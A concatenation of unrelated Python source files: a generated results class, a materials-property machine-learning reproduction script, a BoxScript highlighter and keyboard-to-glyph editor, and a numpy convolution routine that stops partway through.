"""Excursion in roll"""
return self.__rollExcursion
@rollExcursion.setter
def rollExcursion(self, value: float):
"""Set rollExcursion"""
self.__rollExcursion = float(value)
@property
def pitchExcursion(self) -> float:
"""Excursion in pitch"""
return self.__pitchExcursion
@pitchExcursion.setter
def pitchExcursion(self, value: float):
"""Set pitchExcursion"""
self.__pitchExcursion = float(value)
@property
def yawExcursion(self) -> float:
"""Excursion in yaw"""
return self.__yawExcursion
@yawExcursion.setter
def yawExcursion(self, value: float):
"""Set yawExcursion"""
self.__yawExcursion = float(value)
@property
def periodResults(self) -> List[PeriodEigenvalueResult]:
""""""
return self.__periodResults
@periodResults.setter
def periodResults(self, value: List[PeriodEigenvalueResult]):
"""Set periodResults"""
if not isinstance(value, Sequence):
raise Exception("Expected sequense, but was " , type(value))
self.__periodResults = value
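# Hedged usage sketch (not part of the generated file):
# result = BodyEigenvalueResult(name="hull", surgeExcursion=1.2, yawExcursion=0.3)
# result.periodResults = []   # list-valued setters insist on a Sequence
# print(result.blueprint)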
|
# import important libraries
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib.patches as patches
import seaborn as sns
import os
import argparse
# import machine learning libraries
from sklearn.linear_model import Ridge, LogisticRegression
from sklearn.svm import SVR, SVC
from sklearn.metrics import f1_score
from sklearn.model_selection import cross_val_predict, GridSearchCV, KFold
from sklearn.metrics import confusion_matrix, classification_report,\
precision_recall_fscore_support
# import custom functions for vectorizing & visualizing data
import utils
from process_data import get_split
plt.rcParams.update({'font.size': 12})
all_props = ['bulk_modulus',
'thermal_conductivity',
'shear_modulus',
'band_gap',
'debye_temperature',
'thermal_expansion']
symbols = ['B', '$\\kappa$', 'G', 'E$_{\\mathrm{g}}$', 'D', '$\\alpha$']
prop_labels = ['Bulk Modulus (GPa)',
'Log$_{10}$ Thermal Conductivity $\\left(\\dfrac{\\mathrm{W}}' +
'{\\mathrm{m}\\cdot \\mathrm{K}}\\right)$',
'Shear Modulus (GPa)',
'Band Gap (eV)',
'Log$_{10}$ Debye Temperature (K)',
'Log$_{10}$ Thermal Expansion $(\\mathrm{K}^{-1})$']
arg2prop = {'bulk_modulus': 'ael_bulk_modulus_vrh',
'thermal_conductivity': 'agl_log10_thermal_conductivity_300K',
'shear_modulus': 'ael_shear_modulus_vrh',
'band_gap': 'Egap',
'debye_temperature': 'ael_log10_debye_temperature',
'thermal_expansion': 'agl_log10_thermal_expansion_300K'}
prop2label = dict([[v, k] for k, v
in zip(prop_labels, arg2prop.values())])
parser_desc = 'Reproduce the results of this work'
parser = argparse.ArgumentParser(description=parser_desc)
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('--properties',
type=str,
nargs='+',
metavar='Property to reproduce',
choices=all_props,
help=('example:\n\t' +
'python reproduce.py --properties bulk_modulus\n\t'))
group.add_argument('--all',
action='store_true',
help='Run through each property one at a time '
'and generate results and figures.')
args = parser.parse_args()
if not args.all:
mat_props = []
for j in args.properties:
mat_props.append(arg2prop[j])
else:
mat_props = list(map(lambda p: arg2prop[p], all_props))
print('Reproducing results for the following data:', mat_props)
def optimize_threshold(y_train_labeled, y_train_pred):
"""Given a DataFrame of labels and predictions, return the
optimal threshold for a high F1 score"""
y_train_ = y_train_labeled.copy()
y_train_pred_ = pd.Series(y_train_pred).copy()
f1score_max = 0
for threshold in np.arange(0.1, 1, 0.1):
diff = (max(y_train_pred) - min(y_train_pred))
threshold = min(y_train_pred) + threshold * diff
y_train_pred_[y_train_pred < threshold] = 0
y_train_pred_[y_train_pred >= threshold] = 1
f1score = f1_score(y_train_, y_train_pred_)
if f1score > f1score_max:
f1score_max = f1score
opt_thresh = threshold
return opt_thresh
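# Illustrative note (not from the original script): optimize_threshold scans
# fractional cut points 0.1..0.9 of the prediction range; e.g. if predictions
# span [0, 10] it evaluates absolute thresholds 1, 2, ..., 9 and keeps the one
# with the highest F1 against the "extraordinary" labels.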
def get_performance(mat_props, seed):
metrics_dict = {}
for mat_prop in mat_props:
os.makedirs('figures/'+mat_prop, exist_ok=True)
data = get_split(mat_prop, elem_prop='oliynyk', seed_num=seed)
X_train_scaled, X_test_scaled = data[0:2]
y_train, y_test = data[2:4]
y_train_labeled, y_test_labeled = data[4:6]
formula_train, formula_test = data[6:8]
test_threshold = y_test.iloc[-y_test_labeled.sum().astype(int)]
train_threshold = y_train.iloc[-y_train_labeled.sum().astype(int)]
y = pd.concat([y_train, y_test])
plt.figure(1, figsize=(7, 7))
ax = sns.distplot(y, bins=50, kde=False)
rect1 = patches.Rectangle((test_threshold, 0),
ax.get_xlim()[1]-test_threshold,
ax.get_ylim()[1], linewidth=1,
edgecolor='k',
facecolor='g',
alpha=0.2)
ax.add_patch(rect1)
text_size = 18
ax.text(.1,
.5,
'Ordinary\nCompounds',
size=text_size,
horizontalalignment='left',
verticalalignment='center',
transform=ax.transAxes)
ax.text(.98,
.15,
'Extraordinary\nCompounds',
size=text_size,
horizontalalignment='right',
verticalalignment='center',
transform=ax.transAxes)
ax.tick_params(direction='in',
length=5,
bottom=True,
top=True,
left=True,
right=True,
labelsize=text_size)
ax.set_xlabel(prop2label[mat_prop], size=text_size)
ax.set_ylabel('number of occurrences'.title(), size=text_size)
plt.savefig('figures/' + mat_prop + '/distplot',
dpi=300,
bbox_inches='tight')
plt.clf()
# ## Learn with a Ridge Regression (linear model)
# define ridge regression object
rr = Ridge()
# define k-folds
cv = KFold(n_splits=5, shuffle=True, random_state=1)
# choose search space
parameter_candidates = {'alpha': np.logspace(-5, 2, 10)}
# define the grid search
grid = GridSearchCV(estimator=rr,
param_grid=parameter_candidates,
cv=cv)
# run grid search
grid.fit(X_train_scaled, y_train)
        # plot grid search to ensure good values
utils.plot_1d_grid_search(grid, midpoint=0.75)
print('best parameters:', grid.best_params_)
plt.savefig('figures/' + mat_prop + '/rr_1d_search',
dpi=300,
bbox_inches='tight')
plt.clf()
best_params_rr = grid.best_params_
# best_params_rr = {'alpha': 0.0021544346900318843}
rr = Ridge(**best_params_rr)
rr.fit(X_train_scaled, y_train)
y_test_predicted_rr = rr.predict(X_test_scaled)
y_train_predicted_rr = rr.predict(X_train_scaled)
# plot the data
plt.figure(figsize=(6, 6))
plt.plot(y_test,
y_test_predicted_rr,
marker='o',
mfc='none',
color='#0077be',
linestyle='none',
label='test')
plt.plot(y_train,
y_train_predicted_rr,
marker='o',
mfc='none',
color='#e34234',
linestyle='none',
label='train')
max_val = max(y_test.max(), y_test_predicted_rr.max())
min_val = min(y_test.min(), y_test_predicted_rr.min())
plt.plot([min_val, max_val], [min_val, max_val], 'k--')
limits = [min_val, max_val]
plt.xlim(limits)
plt.ylim(limits)
plt.xlabel('actual')
plt.ylabel('predicted')
plt.legend(loc=4)
plt.tick_params(direction='in',
length=5,
bottom=True,
top=True,
left=True,
right=True)
plt.savefig('figures/' + mat_prop + '/rr_act_vs_pred',
dpi=300,
bbox_inches='tight')
plt.clf()
# ## Learn with a support vector regression (non-linear model)
# to speed up the grid search, optimize on a subsample of data
X_train_scaled_sampled = X_train_scaled.sample(500, random_state=1)
y_train_sampled = y_train.loc[X_train_scaled_sampled.index.values]
# define support vector regression object (default to rbf kernel)
svr = SVR()
# define k-folds
cv = KFold(n_splits=5, shuffle=True, random_state=1)
# choose search space
parameter_candidates = {'C': np.logspace(2, 4, 8),
'gamma': np.logspace(-3, 1, 8)}
# define the grid search
grid = GridSearchCV(estimator=svr,
param_grid=parameter_candidates,
cv=cv)
# run grid search
grid.fit(X_train_scaled_sampled, y_train_sampled)
# plot grid search to ensure good values
utils.plot_2d_grid_search(grid, midpoint=0.7)
plt.savefig('figures/' + mat_prop + '/svr_2d_search',
dpi=300, bbox_inches='tight')
plt.clf()
print('best parameters:', grid.best_params_)
best_params_svr = grid.best_params_
svr = SVR(**best_params_svr)
svr.fit(X_train_scaled, y_train)
y_test_predicted_svr = svr.predict(X_test_scaled)
y_train_predicted_svr = svr.predict(X_train_scaled)
# plot the data
plt.figure(figsize=(6, 6))
plt.plot(y_test,
y_test_predicted_svr,
marker='o',
mfc='none',
color='#0077be',
linestyle='none',
label='test')
plt.plot(y_train,
y_train_predicted_svr,
marker='o',
mfc='none',
color='#e34234',
linestyle='none',
label='train')
max_val = max(y_test.max(), y_test_predicted_svr.max())
min_val = min(y_test.min(), y_test_predicted_svr.min())
plt.plot([min_val, max_val], [min_val, max_val], 'k--')
limits = [min_val, max_val]
plt.xlim(limits)
plt.ylim(limits)
plt.xlabel('actual')
plt.ylabel('predicted')
plt.legend(loc=4)
plt.tick_params(direction='in',
length=5,
bottom=True,
top=True,
left=True,
right=True)
plt.savefig('figures/' + mat_prop + '/svr_act_vs_pred',
dpi=300,
bbox_inches='tight')
plt.clf()
# # Approach the problem as a classification task
# ## Learn with a logistic regression (linear classification)
# define logistic regression object
lr = LogisticRegression(solver='lbfgs')
# define k-folds
cv = KFold(n_splits=5, shuffle=True, random_state=1)
# choose search space
class_1_weight = [{0: 1, 1: weight} for weight in
np.linspace(1, 50, 5)]
parameter_candidates = {'C': np.logspace(-1, 4, 5),
'class_weight': class_1_weight}
# define the grid search. We use log-loss to decide which
# parameters to use.
grid = GridSearchCV(estimator=lr,
param_grid=parameter_candidates,
scoring='neg_log_loss',
cv=cv)
# run grid search
grid.fit(X_train_scaled, y_train_labeled)
# plot grid search to ensure good values
utils.plot_2d_grid_search(grid, midpoint=-0.05, vmin=-0.13, vmax=0)
plt.savefig('figures/' + mat_prop + '/lr_2d_search',
dpi=300,
bbox_inches='tight')
plt.clf()
print('best parameters:', grid.best_params_)
best_params_lr = grid.best_params_
lr = LogisticRegression(solver='lbfgs', penalty='l2', **best_params_lr)
lr.fit(X_train_scaled, y_train_labeled)
# define k-folds
cv = KFold(n_splits=5, shuffle=True, random_state=1)
y_pred_train_lr = cross_val_predict(lr,
X_train_scaled,
y_train_labeled,
cv=cv)
y_prob_train_lr = cross_val_predict(lr,
X_train_scaled,
y_train_labeled,
cv=cv,
method='predict_proba')
y_probability_train_lr = [probability[1] for probability in
y_prob_train_lr]
y_prob_test_lr = lr.predict_proba(X_test_scaled)
y_probability_test_lr = [probability[1] for probability in
y_prob_test_lr]
df_cm = pd.DataFrame(confusion_matrix(y_train_labeled,
y_pred_train_lr))
ax = sns.heatmap(df_cm,
square=True,
annot=True,
annot_kws={"size": 18},
cbar=False,
linewidths=.5,
cmap="YlGnBu",
center=-10000000)
ax.set_ylabel('actual')
ax.set_xlabel('predicted')
ax.xaxis.tick_top()
plt.savefig('figures/' + mat_prop + '/lr_cm',
dpi=300,
bbox_inches='tight')
plt.clf()
threshold = 0.5
utils.plot_prob(threshold,
y_train,
y_probability_train_lr,
threshold_x=train_threshold,
mat_prop=prop2label[mat_prop])
plt.savefig('figures/' + mat_prop +
'/lr_train_prob_thresh={:0.2f}.png'.format(threshold),
dpi=300,
bbox_inches='tight')
plt.clf()
# ### Check our performance on the test set!
utils.plot_prob(threshold,
y_test,
y_probability_test_lr,
threshold_x=test_threshold,
mat_prop=prop2label[mat_prop])
plt.savefig('figures/' + mat_prop +
'/lr_test_prob_thresh={:0.2f}.png'.format(threshold),
dpi=300,
bbox_inches='tight')
plt.clf()
# ### Compare this performance to regression models
#
# **For the same recall, a compound predicted as extraordinary is roughly
# three times more likely to not actually be extraordinary.**
threshold = optimize_threshold(y_train_labeled, y_train_predicted_rr)
utils.plot_regression(threshold,
y_train,
y_train_predicted_rr,
threshold_x=train_threshold,
mat_prop=prop2label[mat_prop])
plt.savefig('figures/' + mat_prop +
'/rr_train_reg_thresh={:0.2f}.png'.format(threshold),
dpi=300,
bbox_inches='tight')
plt.clf()
utils.plot_regression(threshold,
y_test,
y_test_predicted_rr,
threshold_x=test_threshold,
mat_prop=prop2label[mat_prop])
plt.savefig('figures/' + mat_prop +
'/rr_test_reg_thresh={:0.2f}.png'.format(threshold),
dpi=300,
bbox_inches='tight')
plt.clf()
threshold = optimize_threshold(y_train_labeled, y_train_predicted_svr)
utils.plot_regression(threshold,
y_train,
y_train_predicted_svr,
threshold_x=train_threshold,
mat_prop=prop2label[mat_prop])
plt.savefig('figures/' + mat_prop +
'/svr_train_reg_thresh={:0.02f}.png'.format(threshold),
dpi=300,
bbox_inches='tight')
plt.clf()
utils.plot_regression(threshold,
y_test,
y_test_predicted_svr,
threshold_x=test_threshold,
mat_prop=prop2label[mat_prop])
plt.savefig('figures/' + mat_prop +
'/svr_test_reg_thresh={:0.02f}.png'.format(threshold),
dpi=300,
bbox_inches='tight')
plt.clf()
# ## Learn with a support vector classification (non-linear)
# to speed up the grid search, optimize on a subsample of data
index_location = X_train_scaled_sampled.index.values
y_train_labeled_sampled = y_train_labeled.loc[index_location]
# define support vector classification object
# (need to set probability to True)
svc = SVC(probability=True)
# define k-folds
cv = KFold(n_splits=5, shuffle=True, random_state=1)
# choose search space (we keep class_weight=1 here,
# as that was optimal in the earlier search)
parameter_candidates = {'C': np.logspace(-1, 4, 5),
'gamma': np.logspace(-2, 2, 5)}
# define the grid search. We use log-loss to decide
# which parameters to use.
grid = GridSearchCV(estimator=svc,
param_grid=parameter_candidates,
scoring='neg_log_loss',
cv=cv)
# run grid search
grid.fit(X_train_scaled_sampled, y_train_labeled_sampled)
# plot grid search to ensure good values
utils.plot_2d_grid_search(grid, midpoint=-0.04, vmin=-0.13, vmax=0)
plt.savefig('figures/' + mat_prop +
'/svc_2d_search.png',
dpi=300,
bbox_inches='tight')
plt.clf()
print('best parameters:', grid.best_params_)
best_params_svc = grid.best_params_
svc = SVC(probability=True, **best_params_svc)
svc.fit(X_train_scaled, y_train_labeled)
cv = KFold(n_splits=5, shuffle=True, random_state=1)
y_pred_train_svc = cross_val_predict(svc,
X_train_scaled,
y_train_labeled,
cv=cv)
y_prob_train_svc = cross_val_predict(svc,
X_train_scaled,
y_train_labeled,
cv=cv,
method='predict_proba')
y_probability_train_svc = [probability[1] for probability in
y_prob_train_svc]
y_prob_test_svc = svc.predict_proba(X_test_scaled)
y_probability_test_svc = [probability[1] for probability in
y_prob_test_svc]
metrics = precision_recall_fscore_support(y_train_labeled,
y_pred_train_svc)
precision, recall, fscore, support = metrics
print('precision: {:0.2f}\nrecall: {:0.2f}'.format(precision[1],
recall[1]))
df_cm = pd.DataFrame(confusion_matrix(y_train_labeled,
y_pred_train_svc))
ax = sns.heatmap(df_cm,
square=True,
annot=True,
annot_kws={"size": 18},
cbar=False,
linewidths=0.5,
cmap="YlGnBu",
center=-10000000)
ax.set_ylabel('actual')
ax.set_xlabel('predicted')
ax.xaxis.tick_top()
plt.savefig('figures/' + mat_prop +
'/svc_cm',
dpi=300,
bbox_inches='tight')
plt.clf()
threshold = 0.5
utils.plot_prob(threshold,
y_train,
y_probability_train_svc,
threshold_x=train_threshold,
mat_prop=prop2label[mat_prop])
plt.savefig('figures/' + mat_prop +
'/svc_train_prob_thresh={:0.02f}.png'.format(threshold),
dpi=300,
bbox_inches='tight')
plt.clf()
utils.plot_prob(threshold,
y_test,
y_probability_test_svc,
threshold_x=test_threshold,
mat_prop=prop2label[mat_prop])
plt.savefig('figures/' + mat_prop +
'/svc_test_prob_thresh={:0.2f}.png'.format(threshold),
dpi=300,
bbox_inches='tight')
plt.clf()
metrics_dict[mat_prop] = {'precision': [], 'recall': [], 'f1': []}
threshold = optimize_threshold(y_train_labeled, y_train_predicted_rr)
y_pred_rr = [1 if x >= threshold else 0 for x in y_test_predicted_rr]
threshold = optimize_threshold(y_train_labeled, y_train_predicted_svr)
y_pred_svr = [1 if x >= threshold else 0 for x in y_test_predicted_svr]
threshold = 0.5
y_pred_lr = [1 if x >= threshold else 0 for x in y_probability_test_lr]
threshold = 0.5
y_pred_svc = [1 if x >= threshold else 0 for x in
y_probability_test_svc]
predictions = [y_pred_rr,
y_pred_svr,
y_pred_lr,
y_pred_svc]
for prediction in predictions:
print(classification_report(y_test_labeled, prediction))
metrics = precision_recall_fscore_support(y_test_labeled,
prediction)
precision, recall, f1, support = metrics
metrics_dict[mat_prop]['precision'].append(precision[1])
metrics_dict[mat_prop]['recall'].append(recall[1])
metrics_dict[mat_prop]['f1'].append(f1[1])
return metrics_dict
def build_metrics():
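# Run get_performance for each seed and cache the per-property
# precision/recall/F1 results as CSVs under data/metrics/, skipping any
# property/seed combination that has already been computed.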
for seed in [1]:
metrics = get_performance(mat_props, seed)
for prop in metrics:
metric_csv = prop+'_metrics_seed_{:0.0f}.csv'.format(seed)
computed_metrics = os.listdir('data/metrics/')
if metric_csv in computed_metrics:
continue
else:
df_prop_metric = pd.DataFrame(metrics[prop],
index=['rr', 'svr', 'lr', 'svc'])
df_prop_metric.to_csv('data/metrics/'+metric_csv)
def plot_metrics():
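# Aggregate the cached metric CSVs across seeds 1-5 and plot the mean
# (with a +/- one standard deviation band) of precision, recall and
# F1-score for the four models (ridge, SVR, logistic, SVC), one panel
# per metric.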
metric_mean = {}
metric_std = {}
metric_mean[0] = {}
metric_mean[1] = {}
metric_mean[2] = {}
metric_std[0] = {}
metric_std[1] = {}
metric_std[2] = {}
for prop in mat_props:
rr = []
svr = []
lr = []
svc = []
for seed in [1, 2, 3, 4, 5]:
metric_csv = prop+'_metrics_seed_{:0.0f}.csv'.format(seed)
df_prop_metric = pd.read_csv('data/metrics/'+metric_csv)
rr.append(df_prop_metric.iloc[0, 1:].tolist())
svr.append(df_prop_metric.iloc[1, 1:].tolist())
lr.append(df_prop_metric.iloc[2, 1:].tolist())
svc.append(df_prop_metric.iloc[3, 1:].tolist())
for i in [0, 1, 2]:
metric_mean[i][prop] = [pd.DataFrame(rr).mean()[i],
pd.DataFrame(svr).mean()[i],
pd.DataFrame(lr).mean()[i],
pd.DataFrame(svc).mean()[i]]
metric_std[i][prop] = [pd.DataFrame(rr).std()[i],
pd.DataFrame(svr).std()[i],
pd.DataFrame(lr).std()[i],
pd.DataFrame(svc).std()[i]]
df_p_mean = pd.DataFrame(metric_mean[0], index=['rr', 'svr', 'lr', 'svc'])
df_p_std = pd.DataFrame(metric_std[0], index=['rr', 'svr', 'lr', 'svc'])
df_r_mean = pd.DataFrame(metric_mean[1], index=['rr', 'svr', 'lr', 'svc'])
df_r_std = pd.DataFrame(metric_std[1], index=['rr', 'svr', 'lr', 'svc'])
df_f_mean = pd.DataFrame(metric_mean[2], index=['rr', 'svr', 'lr', 'svc'])
df_f_std = pd.DataFrame(metric_std[2], index=['rr', 'svr', 'lr', 'svc'])
plt.rcParams.update({'font.size': 12})
means = [df_p_mean, df_r_mean, df_f_mean]
stds = [df_p_std, df_r_std, df_f_std]
metric_type = ['Precision', 'Recall', 'F1-Score']
i = 0
f, (ax1, ax2, ax3) = plt.subplots(3, 1, sharey=False, figsize=(7, 9))
f.subplots_adjust(hspace=.05, wspace=1)
axes = [ax1, ax2, ax3]
colors = ['#d7191c', '#fdae61', '#abdda4', '#2b83ba']
prop_loc = [1, 2, 3, 4, 5, 6]
for df_mean, df_std, ax in zip(means, stds, axes):
alpha = 0.15
ax.fill_between(prop_loc,
df_mean.loc['rr']+df_std.loc['rr'],
df_mean.loc['rr']-df_std.loc['rr'],
color=colors[0],
alpha=alpha)
ax.fill_between(prop_loc,
df_mean.loc['svr']+df_std.loc['svr'],
df_mean.loc['svr']-df_std.loc['svr'],
color=colors[3],
alpha=alpha)
ax.fill_between(prop_loc,
df_mean.loc['lr']+df_std.loc['lr'],
df_mean.loc['lr']-df_std.loc['lr'],
color=colors[2],
alpha=alpha)
ax.fill_between(prop_loc,
df_mean.loc['svc']+df_std.loc['svc'],
df_mean.loc['svc']-df_std.loc['svc'],
color=colors[1],
alpha=alpha)
ax.plot(prop_loc, df_mean.loc['rr'], '-x', color=colors[0],
linewidth=2, label='Ridge')
ax.plot(prop_loc, df_mean.loc['svr'], '-s', color=colors[3],
linewidth=2, label='SVR')
ax.plot(prop_loc, df_mean.loc['lr'], '--d', color=colors[2],
linewidth=3, label='Logistic')
ax.plot(prop_loc, df_mean.loc['svc'], '--*', color=colors[1],
linewidth=3, label='SVC')
ax.set_ylabel(metric_type[i])
ax.tick_params(top=True, right=True, direction='in', length=6)
if i == 0:
ax.set_ylim(0.25, 1)
ax.xaxis.set_ticklabels([])
if i == 1:
ax.set_ylim(0.25, 1)
ax.xaxis.set_ticklabels([])
ax.legend(loc=4, fancybox=True, framealpha=0.3)
if i == 2:
ax.set_ylim(0.25, 1)
ax.xaxis.set_ticklabels([])
i += 1
plt.xticks(np.array(prop_loc), labels=[prop for prop in symbols],
rotation=0, ha='center', rotation_mode='anchor')
plt.savefig('figures/metrics.png', dpi=300, bbox_inches='tight')
if __name__ == '__main__':
build_metrics()
|
import math
from blessed import Terminal
from rich.console import Console
from rich.highlighter import RegexHighlighter
from rich.panel import Panel
from rich.style import Style
from rich.text import Text
from rich.theme import Theme
from boxscript.interpreter import Interpreter
co = Console()
class BoxScriptHighlighter(RegexHighlighter):
"""Highlighter for BS syntax"""
base_style = "token."
highlights = [
r"(?P<border>[─━│┃┌┍┎┏┐┑┒┓└┗┘┛├┞┟┡┢┣┤┦┧┩┪┫])",
r"(?P<op>[▨▧▤▥▔░▒▓▚▞▦▩◈])",
r"(?P<number>[▄▀▣]*)",
r"(?P<memory>◇[▄▀▣]*)",
r"(?P<io>[▭▯])",
r"(?P<paren>[▕▏])",
r"(?P<comment>║[^\n]*║|[╔╚]═*[╗╝])",
]
if __name__ == "__main__":
# please customize this!
theme = Theme(
{
"token.border": "#ffffff",
"token.op": "#edb9b6",
"token.number": "#d5b6ed",
"token.memory": "#b6edb9",
"token.io": "#b6eaed",
"token.paren": "#b9b6ed",
"token.comment": "#18191c",
}
)
t = Text(
"""
╔═══════════════════════╗
║This code does nothing ║
╚═══════════════════════╝
┏━━━━━━━━━━━━━━━━┓
┃◇▀▄▒▀▀▄▀▄ ┃
┡━━━━━━━━━━━━━━━━┩
│◇▀▀◈◇▀▄▒▀▀▀▄▄▄▄ │
│◇▀▀▄◈◇▀▄░▀▀▀▄▄▄▄│
│┏━━━━━━━━━━━━━┓ │
│┃◇▀▀▄ ┃ │
│┡━━━━━━━━━━━━━┩ │
││◇▀▀▀◈◇▀▀▄▚▀▀ │ │
││◇▀▀▄◈◇▀▀░◇▀▀▀│ │
││◇▀▀◈◇▀▀▒◇▀▀▀ │ │
│└─────────────┘ │
│╔═════════════╗ │
│║Test [orange]║ │
│╚═════════════╝ │
│▭◇▀▀ │
├────────────────┤
│◇▀▀◈◇▀▄░▀▀ │
│◇▀▄◈◇▀▄▒▀▀ │
│┏━━━━━━━━━━━━┓ │
│┃◇▀▀ ┃ │
│┡━━━━━━━━━━━━┩ │
││◇▀▀▄◈◇▀▀▚▀▀ │ │
││◇▀▀◈◇▀▄░◇▀▀▄│ │
││◇▀▄◈◇▀▄▒◇▀▀▄│ │
│└────────────┘ │
└────────────────┘
"""
"""
)
BoxScriptHighlighter().highlight(t)
Console(theme=theme).print(
Panel(t,
highlight=True,
title="test.bs",
width=50,
height=75,
style=Style(bgcolor="#36393f")
)
)
"""
)
term = Terminal()
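# Map ordinary keyboard characters to the box-drawing and block glyphs
# used by BoxScript, so the language can be typed on a normal keyboard.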
dictofletters = {
"q": "│",
"a": "┃",
"z": "║",
"w": "─",
"s": "━",
"x": "═",
"e": "┌",
"r": "┐",
"t": "└",
"y": "┘",
"d": "┏",
"f": "┓",
"g": "┗",
"h": "┛",
"c": "╔",
"v": "╗",
"b": "╚",
"n": "╝",
"1": "├",
"2": "┤",
"3": "┞",
"4": "┦",
"5": "┟",
"6": "┧",
"7": "┣",
"8": "┫",
"9": "┡",
"0": "┩",
"-": "┢",
"=": "┪",
"_": "╠",
"+": "╣",
"(": "▄",
")": "▀",
"[": "◇",
"]": "◈",
"u": "▔",
"i": "░",
"o": "▒",
"p": "▓",
"j": "▚",
"k": "▞",
"l": "▕",
";": "▏",
"{": "▭",
"}": "▯",
"m": "▖",
",": "▗",
".": "▘",
"/": "▝",
"'": "▌",
'"': "▐",
"<": "▧",
">": "▨",
"?": "▤",
"|": "▥",
}
def main() -> None:
"""Main function."""
row_length = 10
max_row_length = math.floor(term.width / 2)
print(f"{term.home}{term.white_on_black}{term.clear}")
print("press '~' to quit.")
with term.cbreak(): # While you are pressing buttons
val = ""
ll = ""
# max_row_length = len(val)
while ll.lower() != "~": # While the button is not ~
ll = term.inkey()
if val.count("\n") == 0:
max_row_length = len(val)
if ll.name == "KEY_BACKSPACE": # Delete Char
val = val[:-1]
elif ll.name == "KEY_ENTER": # New line
val += "\n"
if row_length > max_row_length:
max_row_length = row_length
row_length = 0
else:
val += dictofletters.get(ll, ll) # Write Char
row_length += 1
print(f"{term.clear}")
Console(theme=theme).print(
Panel(
val,
highlight=True,
title="test.bs",
width=max_row_length,
style=Style(bgcolor="#36393f"),
)
)
print(f"{term.normal}")
print(val)
return val
Interpreter().run(main())
|
import matplotlib
matplotlib.use("Agg")
from imageio import imread
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
import numpy as np
import scipy.signal as sg
import scipy as sp
def get_im2col_indices(x_shape, field_height, field_width, padding=1, stride=1):
# from cs231n assignments
# First figure out what the size of the output should be
N, C, H, W = x_shape
assert (H + 2 * padding - field_height) % stride == 0
assert (W + 2 * padding - field_width) % stride == 0
out_height = (H + 2 * padding - field_height) // stride + 1  # integer division (Python 3)
out_width = (W + 2 * padding - field_width) // stride + 1
i0 = np.repeat(np.arange(field_height), field_width)
i0 = np.tile(i0, C)
i1 = stride * np.repeat(np.arange(out_height), out_width)
j0 = np.tile(np.arange(field_width), field_height * C)
j1 = stride * np.tile(np.arange(out_width), out_height)
i = i0.reshape(-1, 1) + i1.reshape(1, -1)
j = j0.reshape(-1, 1) + j1.reshape(1, -1)
k = np.repeat(np.arange(C), field_height * field_width).reshape(-1, 1)
return (k, i, j)
def im2col_indices(x, field_height, field_width, padding=1, stride=1):
# from cs231n assignments
""" An implementation of im2col based on some fancy indexing """
# Zero-pad the input
p = padding
x_padded = np.pad(x, ((0, 0), (0, 0), (p, p), (p, p)), mode='constant')
k, i, j = get_im2col_indices(x.shape, field_height, field_width, padding,
stride)
cols = x_padded[:, k, i, j]
C = x.shape[1]
cols = cols.transpose(1, 2, 0).reshape(field_height * field_width * C, -1)
return cols
def col2im_indices(cols, x_shape, field_height=3, field_width=3, padding=1,
stride=1):
# from cs231n assignments
""" An implementation of col2im based on fancy indexing and np.add.at """
N, C, H, W = x_shape
H_padded, W_padded = H + 2 * padding, W + 2 * padding
x_padded = np.zeros((N, C, H_padded, W_padded), dtype=cols.dtype)
k, i, j = get_im2col_indices(x_shape, field_height, field_width, padding,
stride)
cols_reshaped = cols.reshape(C * field_height * field_width, -1, N)
cols_reshaped = cols_reshaped.transpose(2, 0, 1)
np.add.at(x_padded, (slice(None), k, i, j), cols_reshaped)
if padding == 0:
return x_padded
return x_padded[:, :, padding:-padding, padding:-padding]
# really, really useful reference
# http://wiseodd.github.io/techblog/2016/07/16/convnet-conv-layer/
def conv2(x, w, b, pad="same", stride=1, dilation=1, cut=True):
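# 2D convolution on NCHW inputs implemented with im2col + a single matmul.
# Inputs whose size does not divide evenly by the stride are cropped first.
# Dilation is handled with a space-to-batch trick: the input is reshaped so
# that a dense convolution over the reshaped batch is equivalent to a dilated
# convolution, and the output is reshaped back (batch-to-space) at the end.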
if pad == "same":
pad = max(w.shape[-1] // 2 - 1, 1)
if dilation != 1:
assert stride == 1
assert cut
n_filt, d_filt, h_filt, w_filt = w.shape
N, C, H, W = x.shape
h_stride_check = (H + 2 * pad - h_filt) % stride
if h_stride_check != 0:
if h_stride_check % 2 == 0:
x = x[:, :, h_stride_check // 2:-h_stride_check // 2, :]
elif h_stride_check // 2 >= 1:
x = x[:, :, h_stride_check // 2:-h_stride_check // 2, :]
elif h_stride_check // 2 == 0:
x = x[:, :, 1:, :]
else:
raise ValueError("Check x")
N, C, H, W = x.shape
h_stride_check = (H + 2 * pad - h_filt) % stride
assert h_stride_check == 0
w_stride_check = (W + 2 * pad - w_filt) % stride
if w_stride_check != 0:
if w_stride_check % 2 == 0:
x = x[:, :, :, w_stride_check // 2:-w_stride_check // 2]
elif w_stride_check // 2 >= 1:
x = x[:, :, :, w_stride_check // 2:-w_stride_check // 2]
elif w_stride_check // 2 == 0:
x = x[:, :, :, 1:]
else:
raise ValueError("Check y")
N, C, H, W = x.shape
w_stride_check = (W + 2 * pad - w_filt) % stride
assert w_stride_check == 0
if dilation != 1:
h_dilation_check = H % dilation
w_dilation_check = W % dilation
if h_dilation_check != 0:
if h_dilation_check // 2 >= 1:
x = x[:, :, h_dilation_check // 2:-h_dilation_check // 2, :]
else:
x = x[:, :, 1:, :]
if w_dilation_check != 0:
if w_dilation_check // 2 >= 1:
x = x[:, :, :, w_dilation_check // 2:-w_dilation_check // 2]
elif w_dilation_check // 2 == 0:
x = x[:, :, :, 1:]
# space -> batch
# NCHW
N, C, H, W = x.shape
assert H % dilation == 0
assert W % dilation == 0
# WCNH
x = x.transpose(3, 1, 0, 2)
new_N = dilation * N
new_H = H // dilation
x = x.reshape(W, C, new_N, new_H)
# HCNW
x = x.transpose(3, 1, 2, 0)
new_W = W // dilation
new_N = dilation * new_N
x = x.reshape(new_H, C, new_N, new_W)
# NCHW
x = x.transpose(2, 1, 0, 3)
n_x, d_x, h_x, w_x = x.shape
h_out = (h_x - h_filt + 2 * pad) // stride + 1
w_out = (w_x - w_filt + 2 * pad) // stride + 1
assert h_out == int(h_out)
assert w_out == int(w_out)
h_out = int(h_out)
w_out = int(w_out)
x_col = im2col_indices(x, h_filt, w_filt, padding=pad, stride=stride)
w_col = w.reshape(n_filt, -1)
if b is None:
out = np.dot(w_col, x_col)
else:
out = np.dot(w_col, x_col) + b[:, None]
out = out.reshape(n_filt, h_out, w_out, n_x)
out = out.transpose(3, 0, 1, 2)
